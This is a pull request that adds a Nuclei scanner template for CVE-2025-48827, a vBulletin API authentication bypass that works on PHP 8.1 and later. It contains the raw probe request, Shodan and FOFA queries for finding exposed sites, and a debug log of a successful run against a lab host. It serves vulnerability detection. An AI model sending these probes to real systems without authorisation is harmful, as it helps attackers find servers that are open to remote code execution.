### PR TITLE
add CVE-2025-48827

### DIFF
--- a/http/cves/2025/CVE-2025-48827.yaml
+++ b/http/cves/2025/CVE-2025-48827.yaml
@@ -1,0 +1,50 @@
+id: CVE-2025-48827
+
+info:
+  name: vBulletin - Authentication Bypass
+  author: pszyszkowski
+  severity: critical
+  description: |
+    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.
+    Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
+  impact: |
+    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
+  remediation: |
+    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
+  reference:
+    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
+  classification:
+    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2025-48827
+    cwe-id: CWE-424
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: vbulletin
+    product: vbulletin
+    fofa-query: app="vBulletin"
+    shodan-query: http.component:"vBulletin"
+  tags: cve,cve2025,rce,vbulletin,intrusive
+
+variables:
+  rand_string: "{{to_lower(rand_base(5))}}"
+  rand_value: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        template={{rand_string}}&id_name={{rand_value}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains_all(body,'{{rand_string}}','{{rand_value}}')
+        condition: and


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2025-48827
- References:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
nuclei -t .\http\cves\2025\CVE-2025-48827.yaml -u http://172.25.92.145:8081/ -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.6

                projectdiscovery.io

[INF] Current nuclei version: v3.4.6 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-48827] Dumped HTTP request for http://172.25.92.145:8081/ajax/api/ad/wrapAdTemplate

POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
Host: 172.25.92.145:8081
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

template=rre5o&id_name=zqejh
[DBG] [CVE-2025-48827] Dumped HTTP response http://172.25.92.145:8081/ajax/api/ad/wrapAdTemplate

HTTP/1.1 200 OK
Connection: close
Content-Length: 44
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Content-Type: application/json; charset=UTF-8
Date: Tue, 01 Jul 2025 06:49:29 GMT
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Tue, 01 Jul 2025 06:49:29 GMT
Pragma: no-cache
Server: Apache/2.4.62 (Debian)
Set-Cookie: bbsessionhash=ba003a465d529f87cc788901fca3a3db; path=/; HttpOnly
Set-Cookie: bblastvisit=1751352569; expires=Wed, 01-Jul-2026 06:49:29 GMT; Max-Age=31536000; path=/; HttpOnly
Set-Cookie: bblastactivity=1751352569; expires=Wed, 01-Jul-2026 06:49:29 GMT; Max-Age=31536000; path=/; HttpOnly
Set-Cookie: bbsessionhash=d40db5c0f1d2925dd20b69f435a32395; path=/; HttpOnly
X-Powered-By: PHP/8.1.32

"<div class=\"ad_zqejh_inner\">rre5o<\/div>"
[CVE-2025-48827:dsl-1] [http] [critical] http://172.25.92.145:8081/ajax/api/ad/wrapAdTemplate
[INF] Scan completed in 9.6876ms. 1 matches found.
```

#### Additional Details (leave it blank if not applicable)

Hi team,
I found out during template testing it's basically the same as CVE-2025-48828.
Also current CVE-2025-48828 template should probably be named CVE-2025-48827 as CVE-2025-48827 requires PHP 8.1.
I'll send a lab for both PHP versions.
Versions below PHP 8.1 are not exploitable in both templates and return errors like this:
```
{"errors":[["unexpected_error","Trying to invoke protected method vB_Api_Ad::replaceAdTemplate() from scope ReflectionMethod"]]}
```
Both templates try to access private methods as described in https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
Maybe CVE-2025-48828 should check if this error occurs and CVE-2025-48827 if variables are reflected in response?

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

/claim #12506

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)